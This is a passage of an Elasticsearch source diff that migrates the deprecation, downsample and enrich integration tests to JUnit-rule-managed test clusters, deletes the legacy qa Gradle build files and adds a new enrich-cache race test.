org.junit.ClassRule; import org.junit.Rule; import org.junit.rules.TestName; @@ -44,9 +46,13 @@ import static org.elasticsearch.common.logging.DeprecatedMessage.KEY_FIELD_NAME; import static org.elasticsearch.common.logging.DeprecatedMessage.X_OPAQUE_ID_FIELD_NAME; -import static org.elasticsearch.xpack.deprecation.TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE1; -import static org.elasticsearch.xpack.deprecation.TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE2; -import static org.elasticsearch.xpack.deprecation.TestDeprecationHeaderRestAction.TEST_NOT_DEPRECATED_SETTING; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.COMPATIBLE_API_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_ENDPOINT; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.DEPRECATED_USAGE; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE1; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE2; +import 
static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_DEPRECATED_SETTING_TRUE3; +import static org.elasticsearch.xpack.deprecation.DeprecationSettings.TEST_NOT_DEPRECATED_SETTING; import static org.hamcrest.Matchers.allOf; import static org.hamcrest.Matchers.containsInAnyOrder; import static org.hamcrest.Matchers.containsString; @@ -62,6 +68,25 @@ */ public class DeprecationHttpIT extends ESRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("deprecation-plugin") + .module("x-pack-deprecation") + .module("x-pack-stack") + .module("x-pack-ilm") + .module("ingest-common") + .module("constant-keyword") + .setting("cluster.deprecation_indexing.enabled", "true") + .setting("cluster.deprecation_indexing.flush_interval", "100ms") + .setting("xpack.security.enabled", "false") + .setting("xpack.license.self_generated.type", "trial") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Rule public TestName testName = new TestName(); @@ -233,9 +258,9 @@ private void doTestDeprecationWarningsAppearInHeaders(String xOpaqueId) throws E final List deprecatedWarnings = getWarningHeaders(response.getHeaders()); final List> headerMatchers = new ArrayList<>(4); - headerMatchers.add(equalTo(TestDeprecationHeaderRestAction.DEPRECATED_ENDPOINT)); + headerMatchers.add(equalTo(DEPRECATED_ENDPOINT)); if (useDeprecatedField) { - headerMatchers.add(equalTo(TestDeprecationHeaderRestAction.DEPRECATED_USAGE)); + headerMatchers.add(equalTo(DEPRECATED_USAGE)); } assertThat(deprecatedWarnings, everyItem(matchesRegex(HeaderWarning.WARNING_HEADER_PATTERN))); @@ -379,12 +404,7 @@ public void testDeprecationMessagesCanBeIndexed() throws Exception { */ public void testDeprecationCriticalWarnMessagesCanBeIndexed() throws Exception { final Request request = new Request("GET", "/_test_cluster/only_deprecated_setting"); - request.setEntity( - buildSettingsRequest( - Collections.singletonList(TestDeprecationHeaderRestAction.TEST_DEPRECATED_SETTING_TRUE3), - "deprecation_critical" - ) - ); + request.setEntity(buildSettingsRequest(Collections.singletonList(TEST_DEPRECATED_SETTING_TRUE3), "deprecation_critical")); performScopedRequest(request); assertBusy(() -> { @@ -601,7 +621,7 @@ public void testCompatibleMessagesCanBeIndexed() throws Exception { final List deprecatedWarnings = getWarningHeaders(deprecatedApiResponse.getHeaders()); assertThat( extractWarningValuesFromWarningHeaders(deprecatedWarnings), - containsInAnyOrder(TestDeprecationHeaderRestAction.DEPRECATED_ENDPOINT, TestDeprecationHeaderRestAction.COMPATIBLE_API_USAGE) + containsInAnyOrder(DEPRECATED_ENDPOINT, COMPATIBLE_API_USAGE) ); assertBusy(() -> { diff --git a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java similarity index 80% rename from x-pack/plugin/deprecation/qa/early-deprecation-rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java rename to x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java index 798730970d9d3..b5a42d27bc6b1 100644 --- a/x-pack/plugin/deprecation/qa/early-deprecation-rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java +++ 
b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/EarlyDeprecationIndexingIT.java @@ -15,7 +15,9 @@ import org.elasticsearch.client.RestClient; import org.elasticsearch.client.RestClientBuilder; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.test.cluster.ElasticsearchCluster; import org.elasticsearch.test.rest.ESRestTestCase; +import org.junit.ClassRule; import java.io.IOException; import java.util.List; @@ -35,6 +37,28 @@ */ public class EarlyDeprecationIndexingIT extends ESRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("early-deprecation-plugin") + .module("x-pack-deprecation") + .module("x-pack-stack") + .module("x-pack-ilm") + .module("ingest-common") + .module("constant-keyword") + .module("data-streams") + .setting("xpack.security.enabled", "false") + .setting("xpack.license.self_generated.type", "trial") + .setting("cluster.deprecation_indexing.enabled", "true") + .setting("cluster.deprecation_indexing.flush_interval", "1ms") + .setting("logger.org.elasticsearch.xpack.deprecation", "TRACE") + .setting("logger.org.elasticsearch.xpack.deprecation.logging", "TRACE") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + /** * In EarlyDeprecationTestPlugin#onNodeStarted we simulate a very early deprecation that can happen before the template is loaded * The indexing has to be delayed until templates are loaded. diff --git a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java similarity index 82% rename from x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java rename to x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java index 54a48ab34e991..4ee5f39e8df55 100644 --- a/x-pack/plugin/deprecation/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java +++ b/x-pack/plugin/deprecation/qa/src/javaRestTest/java/org/elasticsearch/xpack/deprecation/MlDeprecationIT.java @@ -13,9 +13,11 @@ import org.elasticsearch.client.WarningsHandler; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.search.SearchModule; +import org.elasticsearch.test.cluster.ElasticsearchCluster; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.xcontent.NamedXContentRegistry; import org.junit.After; +import org.junit.ClassRule; import java.io.IOException; import java.util.Collections; @@ -28,6 +30,29 @@ public class MlDeprecationIT extends ESRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("deprecation-plugin") + .module("x-pack-deprecation") + .module("x-pack-stack") + .module("x-pack-ilm") + .module("x-pack-ml") + .module("mapper-extras") + .module("wildcard") + .module("ingest-common") + .module("constant-keyword") + .module("transform") + .setting("cluster.deprecation_indexing.enabled", "true") + .setting("cluster.deprecation_indexing.flush_interval", "100ms") + .setting("xpack.security.enabled", "false") + .setting("xpack.license.self_generated.type", "trial") + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + private static final RequestOptions 
REQUEST_OPTIONS = RequestOptions.DEFAULT.toBuilder() .setWarningsHandler(WarningsHandler.PERMISSIVE) .build(); diff --git a/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java b/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java index 6f1853eaeed68..bf314d405f139 100644 --- a/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java +++ b/x-pack/plugin/deprecation/src/test/java/org/elasticsearch/xpack/deprecation/DataStreamDeprecationCheckerTests.java @@ -78,7 +78,7 @@ public void testOldIndicesCheck() { public void testOldIndicesCheckWithOnlyNewIndices() { // This tests what happens when any old indices that we have are closed. We expect no deprecation warning. - int newOpenIndexCount = randomIntBetween(0, 100); + int newOpenIndexCount = randomIntBetween(1, 100); int newClosedIndexCount = randomIntBetween(0, 100); Map nameToIndexMetadata = new HashMap<>(); diff --git a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java index 6794bc47fa3cd..dfef469a27812 100644 --- a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java +++ b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java @@ -35,7 +35,7 @@ public DownsampleRestIT(final ClientYamlTestCandidate testCandidate) { @ParametersFactory public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); + return ESClientYamlSuiteTestCase.createParameters(new String[] { "downsample" }); } } diff --git a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java index 8f75e76315844..d9a44ab1508d6 100644 --- a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java +++ b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithBasicRestIT.java @@ -34,7 +34,7 @@ public DownsampleWithBasicRestIT(final ClientYamlTestCandidate testCandidate) { @ParametersFactory public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); + return ESClientYamlSuiteTestCase.createParameters(new String[] { "downsample" }); } } diff --git a/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithSecurityRestIT.java b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithSecurityRestIT.java new file mode 100644 index 0000000000000..afde47b377400 --- /dev/null +++ b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleWithSecurityRestIT.java @@ -0,0 +1,53 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.xpack.downsample; + +import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; + +import org.elasticsearch.common.settings.SecureString; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.util.concurrent.ThreadContext; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.local.distribution.DistributionType; +import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; +import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; +import org.junit.ClassRule; + +public class DownsampleWithSecurityRestIT extends ESClientYamlSuiteTestCase { + + public static final String USERNAME = "elastic_admin"; + public static final String PASSWORD = "admin-password"; + + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .distribution(DistributionType.DEFAULT) + .setting("xpack.license.self_generated.type", "trial") + .setting("xpack.security.enabled", "true") + .user(USERNAME, PASSWORD) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + + public DownsampleWithSecurityRestIT(final ClientYamlTestCandidate testCandidate) { + super(testCandidate); + } + + @Override + protected Settings restClientSettings() { + String authentication = basicAuthHeaderValue(USERNAME, new SecureString(PASSWORD.toCharArray())); + return Settings.builder().put(super.restClientSettings()).put(ThreadContext.PREFIX + ".Authorization", authentication).build(); + } + + @ParametersFactory + public static Iterable parameters() throws Exception { + return ESClientYamlSuiteTestCase.createParameters(new String[] { "downsample-with-security" }); + } +} diff --git a/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/resources/rest-api-spec/test/downsample/10_basic.yml b/x-pack/plugin/downsample/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/downsample-with-security/10_basic.yml similarity index 100% rename from x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/resources/rest-api-spec/test/downsample/10_basic.yml rename to x-pack/plugin/downsample/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/downsample-with-security/10_basic.yml diff --git a/x-pack/plugin/downsample/qa/with-security/build.gradle b/x-pack/plugin/downsample/qa/with-security/build.gradle deleted file mode 100644 index 29980b95d0291..0000000000000 --- a/x-pack/plugin/downsample/qa/with-security/build.gradle +++ /dev/null @@ -1,33 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. 
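
All three downsample suites now hand createParameters an explicit root, which (judging from these hunks) limits each class to the YAML tests under its own directory instead of picking up every suite on the classpath:

    @ParametersFactory
    public static Iterable<Object[]> parameters() throws Exception {
        // only suites under rest-api-spec/test/downsample-with-security run in this class
        return ESClientYamlSuiteTestCase.createParameters(new String[] { "downsample-with-security" });
    }
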
- */ - -import org.elasticsearch.gradle.Version - -apply plugin: 'elasticsearch.legacy-yaml-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test' - -dependencies { - yamlRestTestImplementation project(path: xpackModule('rollup')) -} - -restResources { - restApi { - include '_common', 'bulk', 'cluster', 'indices', 'search', 'ingest.put_pipeline', 'ingest.delete_pipeline' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.license.self_generated.type', 'trial' - setting 'xpack.security.enabled', 'true' - user username: 'elastic_admin', password: 'admin-password' -} - -if (buildParams.inFipsJvm){ - // This test cluster is using a BASIC license and FIPS 140 mode is not supported in BASIC - tasks.named("yamlRestTest").configure{enabled = false } -} diff --git a/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java b/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java deleted file mode 100644 index 7bdbd5e6b0937..0000000000000 --- a/x-pack/plugin/downsample/qa/with-security/src/yamlRestTest/java/org/elasticsearch/xpack/downsample/DownsampleRestIT.java +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package org.elasticsearch.xpack.downsample; - -import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; - -import org.elasticsearch.common.settings.SecureString; -import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; -import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; -import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; - -public class DownsampleRestIT extends ESClientYamlSuiteTestCase { - - public DownsampleRestIT(final ClientYamlTestCandidate testCandidate) { - super(testCandidate); - } - - @Override - protected Settings restClientSettings() { - String authentication = basicAuthHeaderValue("elastic_admin", new SecureString("admin-password".toCharArray())); - return Settings.builder().put(super.restClientSettings()).put(ThreadContext.PREFIX + ".Authorization", authentication).build(); - } - - @ParametersFactory - public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); - } - -} diff --git a/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java b/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java index e1aa3fe865ffd..b07a00c13903c 100644 --- a/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java +++ b/x-pack/plugin/downsample/src/internalClusterTest/java/org/elasticsearch/xpack/downsample/DataStreamLifecycleDownsampleDisruptionIT.java @@ -14,6 +14,7 @@ import org.elasticsearch.action.downsample.DownsampleConfig; import org.elasticsearch.cluster.metadata.DataStreamLifecycle; import org.elasticsearch.cluster.metadata.IndexMetadata; +import org.elasticsearch.cluster.routing.allocation.decider.EnableAllocationDecider; import org.elasticsearch.cluster.service.ClusterService; 
import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.TimeValue; @@ -34,9 +35,12 @@ public class DataStreamLifecycleDownsampleDisruptionIT extends DownsamplingInteg @Override protected Settings nodeSettings(int nodeOrdinal, Settings otherSettings) { - Settings.Builder settings = Settings.builder().put(super.nodeSettings(nodeOrdinal, otherSettings)); - settings.put(DataStreamLifecycleService.DATA_STREAM_LIFECYCLE_POLL_INTERVAL, "1s"); - return settings.build(); + return Settings.builder() + .put(super.nodeSettings(nodeOrdinal, otherSettings)) + .put(DataStreamLifecycleService.DATA_STREAM_LIFECYCLE_POLL_INTERVAL, "1s") + // We disable shard rebalancing to avoid shard relocations timing out the `ensureGreen` call at the end of the test. See #131394 + .put(EnableAllocationDecider.CLUSTER_ROUTING_REBALANCE_ENABLE_SETTING.getKey(), "none") + .build(); } public void testDataStreamLifecycleDownsampleRollingRestart() throws Exception { @@ -85,7 +89,7 @@ public void testDataStreamLifecycleDownsampleRollingRestart() throws Exception { ensureDownsamplingStatus(targetIndex, IndexMetadata.DownsampleTaskStatus.SUCCESS, TimeValue.timeValueSeconds(120)); ensureGreen(targetIndex); - logger.info("-> Relocation has finished"); + logger.info("-> Index is green and downsampling completed successfully."); } private void ensureDownsamplingStatus(String downsampledIndex, IndexMetadata.DownsampleTaskStatus expectedStatus, TimeValue timeout) { diff --git a/x-pack/plugin/enrich/build.gradle b/x-pack/plugin/enrich/build.gradle index 46972578ae1fc..e426a4f2c58cf 100644 --- a/x-pack/plugin/enrich/build.gradle +++ b/x-pack/plugin/enrich/build.gradle @@ -1,9 +1,12 @@ apply plugin: 'elasticsearch.internal-es-plugin' apply plugin: 'elasticsearch.internal-cluster-test' +apply plugin: 'elasticsearch.internal-java-rest-test' +apply plugin: 'elasticsearch.internal-yaml-rest-test' + esplugin { name = 'x-pack-enrich' description = 'Elasticsearch Expanded Pack Plugin - Enrich' - classname ='org.elasticsearch.xpack.enrich.EnrichPlugin' + classname = 'org.elasticsearch.xpack.enrich.EnrichPlugin' extendedPlugins = ['x-pack-core'] } base { @@ -20,6 +23,27 @@ dependencies { testImplementation project(xpackModule('spatial')) testImplementation(testArtifact(project(xpackModule('monitoring')))) internalClusterTestImplementation project(':modules:rest-root') + + clusterModules project(':modules:analysis-common') + clusterModules project(':modules:ingest-common') + clusterModules project(':modules:mapper-extras') + + clusterModules project(xpackModule('monitoring')) + clusterModules project(xpackModule('ilm')) + clusterModules project(xpackModule('wildcard')) +} + +tasks.named('yamlRestTest') { + // single tests can be run using the same cluster configuration as used for Java REST tests, but cleanup inbetween tests fails + usesDefaultDistribution("cleanUpCluster fails if not using the default distribution") +} + +restResources { + restApi { + include '_common', 'bulk', 'indices', 'index', 'ingest.delete_pipeline', 'ingest.put_pipeline', 'enrich', 'get', 'capabilities' + } + restTests { + includeXpack 'enrich' + } } -addQaCheckDependencies(project) diff --git a/x-pack/plugin/enrich/qa/common/build.gradle b/x-pack/plugin/enrich/qa/common/build.gradle deleted file mode 100644 index d12c4b471b29e..0000000000000 --- a/x-pack/plugin/enrich/qa/common/build.gradle +++ /dev/null @@ -1,5 +0,0 @@ -apply plugin: 'elasticsearch.java' - -dependencies { - api project(':test:framework') -} diff --git 
a/x-pack/plugin/enrich/qa/rest-with-advanced-security/build.gradle b/x-pack/plugin/enrich/qa/rest-with-advanced-security/build.gradle deleted file mode 100644 index 6a1f820e36205..0000000000000 --- a/x-pack/plugin/enrich/qa/rest-with-advanced-security/build.gradle +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.legacy-java-rest-test' - -dependencies { - javaRestTestImplementation project(path: xpackModule('core')) - javaRestTestImplementation project(path: xpackModule('enrich:qa:common')) -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - extraConfigFile 'roles.yml', file('roles.yml') - user username: "test_admin", password: "x-pack-test-password", role: "superuser" - user username: "test_enrich", password: "x-pack-test-password", role: "integ_test_role" - setting 'xpack.license.self_generated.type', 'trial' - setting 'xpack.security.enabled', 'true' - setting 'xpack.monitoring.collection.enabled', 'true' -} diff --git a/x-pack/plugin/enrich/qa/rest-with-security/build.gradle b/x-pack/plugin/enrich/qa/rest-with-security/build.gradle deleted file mode 100644 index 17a213a6e7f0d..0000000000000 --- a/x-pack/plugin/enrich/qa/rest-with-security/build.gradle +++ /dev/null @@ -1,28 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.legacy-java-rest-test' - -dependencies { - javaRestTestImplementation project(path: xpackModule('core')) - javaRestTestImplementation project(path: xpackModule('enrich:qa:common')) -} -if (buildParams.inFipsJvm){ - // This test cluster is using a BASIC license and FIPS 140 mode is not supported in BASIC - tasks.named("javaRestTest").configure{enabled = false } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - extraConfigFile 'roles.yml', file('roles.yml') - user username: "test_admin", password: "x-pack-test-password", role: "superuser" - user username: "test_enrich", password: "x-pack-test-password", role: "enrich_user,integ_test_role" - user username: "test_enrich_no_privs", password: "x-pack-test-password", role: "enrich_no_privs" - setting 'xpack.license.self_generated.type', 'basic' - setting 'xpack.security.enabled', 'true' - setting 'xpack.monitoring.collection.enabled', 'true' -} diff --git a/x-pack/plugin/enrich/qa/rest/build.gradle b/x-pack/plugin/enrich/qa/rest/build.gradle deleted file mode 100644 index cf3c687004cbb..0000000000000 --- a/x-pack/plugin/enrich/qa/rest/build.gradle +++ /dev/null @@ -1,40 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. 
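
The enrich qa build files deleted here all configured legacy Gradle-managed test clusters; their settings move into per-suite JUnit rules, as the Java hunks later in this diff show. A condensed sketch of the replacement pattern (module list abbreviated, values taken from those hunks):

    @ClassRule
    public static ElasticsearchCluster cluster = ElasticsearchCluster.local()
        .module("x-pack-enrich")
        .setting("xpack.license.self_generated.type", "basic")
        .setting("xpack.security.enabled", "false")
        .build();

    @Override
    protected String getTestRestCluster() {
        return cluster.getHttpAddresses();
    }
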
- */ - -apply plugin: 'elasticsearch.legacy-java-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test' - -import org.elasticsearch.gradle.Version - -restResources { - restApi { - include '_common', 'bulk', 'indices', 'index', 'ingest.delete_pipeline', 'ingest.put_pipeline', 'enrich', 'get', 'capabilities' - } - restTests { - includeXpack 'enrich' - } -} - -dependencies { - javaRestTestImplementation project(path: xpackModule('enrich:qa:common')) -} - -if (buildParams.inFipsJvm){ - // This test cluster is using a BASIC license and FIPS 140 mode is not supported in BASIC - tasks.named("javaRestTest").configure{enabled = false } - tasks.named("yamlRestTest").configure{enabled = false } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.license.self_generated.type', 'basic' - setting 'xpack.monitoring.collection.enabled', 'true' - setting 'xpack.security.enabled', 'false' - requiresFeature 'es.index_mode_feature_flag_registered', Version.fromString("8.4.0") -} - diff --git a/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichPolicyChangeIT.java b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichPolicyChangeIT.java new file mode 100644 index 0000000000000..27c11e4300437 --- /dev/null +++ b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichPolicyChangeIT.java @@ -0,0 +1,173 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.enrich; + +import org.elasticsearch.action.index.IndexRequest; +import org.elasticsearch.action.ingest.SimulateDocumentBaseResult; +import org.elasticsearch.action.support.WriteRequest; +import org.elasticsearch.cluster.service.ClusterService; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.core.Strings; +import org.elasticsearch.ingest.common.IngestCommonPlugin; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.reindex.ReindexPlugin; +import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.xcontent.XContentType; +import org.elasticsearch.xpack.core.XPackSettings; +import org.elasticsearch.xpack.core.enrich.EnrichPolicy; +import org.elasticsearch.xpack.core.enrich.action.ExecuteEnrichPolicyAction; +import org.elasticsearch.xpack.core.enrich.action.PutEnrichPolicyAction; + +import java.util.Collection; +import java.util.List; +import java.util.concurrent.atomic.AtomicBoolean; + +import static org.elasticsearch.ingest.IngestPipelineTestUtils.jsonSimulatePipelineRequest; +import static org.elasticsearch.xpack.enrich.AbstractEnrichTestCase.createSourceIndices; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.nullValue; + +public class EnrichPolicyChangeIT extends ESSingleNodeTestCase { + + @Override + protected Collection> getPlugins() { + return List.of(LocalStateEnrich.class, ReindexPlugin.class, IngestCommonPlugin.class); + } + + @Override + protected Settings nodeSettings() { + return Settings.builder() + // TODO Change this to run with security enabled + // https://github.com/elastic/elasticsearch/issues/75940 + .put(XPackSettings.SECURITY_ENABLED.getKey(), false) + .build(); + } + + private final String policyName = 
"device-enrich-policy"; + private final String sourceIndexName = "devices-idx"; + + public void testEnrichCacheValuesCannotBeCorrupted() throws Exception { + // create and store the enrich policy + final var enrichPolicy = new EnrichPolicy( + EnrichPolicy.MATCH_TYPE, + null, + List.of(sourceIndexName), + "host.ip", + List.of("device.name", "host.ip") + ); + + // create the source index + createSourceIndices(client(), enrichPolicy); + + // add a single document to the enrich index + setEnrichDeviceName("some.device." + randomAlphaOfLength(10)); + + // store the enrich policy + var putPolicyRequest = new PutEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName, enrichPolicy); + client().execute(PutEnrichPolicyAction.INSTANCE, putPolicyRequest).actionGet(); + + // execute the policy once + executeEnrichPolicy(); + + // add a low priority cluster state applier to increase the odds of a race occurring between + // the cluster state *appliers* having been run (this adjusts the enrich index pointer) and the + // cluster state *listeners* having been run (which adjusts the alias and therefore the search results) + final var clusterService = node().injector().getInstance(ClusterService.class); + clusterService.addLowPriorityApplier((event) -> safeSleep(10)); + + // kick off some threads that just bang on _simulate in the background + final var finished = new AtomicBoolean(false); + for (int i = 0; i < 5; i++) { + new Thread(() -> { + while (finished.get() == false) { + simulatePipeline(); + } + }).start(); + } + + try { + for (int i = 0; i < randomIntBetween(10, 100); i++) { + final String deviceName = "some.device." + randomAlphaOfLength(10); + + // add a single document to the enrich index + setEnrichDeviceName(deviceName); + + // execute the policy + executeEnrichPolicy(); + + // simulate the pipeline and confirm that we see the expected result + assertBusy(() -> { + var result = simulatePipeline(); + assertThat(result.getFailure(), nullValue()); + assertThat(result.getIngestDocument().getFieldValue("device.name", String.class), equalTo(deviceName)); + }); + } + } finally { + // we're finished, so those threads can all quit now + finished.set(true); + } + } + + private SimulateDocumentBaseResult simulatePipeline() { + final var simulatePipelineRequest = jsonSimulatePipelineRequest(""" + { + "pipeline": { + "processors": [ + { + "enrich": { + "policy_name": "device-enrich-policy", + "field": "host.ip", + "target_field": "_tmp.device" + } + }, + { + "rename" : { + "field" : "_tmp.device.device.name", + "target_field" : "device.name" + } + } + ] + }, + "docs": [ + { + "_source": { + "host": { + "ip": "10.151.80.8" + } + } + } + ] + } + """); + final var response = clusterAdmin().simulatePipeline(simulatePipelineRequest).actionGet(); + return (SimulateDocumentBaseResult) response.getResults().getFirst(); + } + + private void setEnrichDeviceName(final String deviceName) { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("1"); // there's only one document, and we keep overwriting it + indexRequest.source(Strings.format(""" + { + "host": { + "ip": "10.151.80.8" + }, + "device": { + "name": "%s" + } + } + """, deviceName), XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + } + + private void executeEnrichPolicy() { + final var executePolicyRequest = new ExecuteEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName); + client().execute(ExecuteEnrichPolicyAction.INSTANCE, 
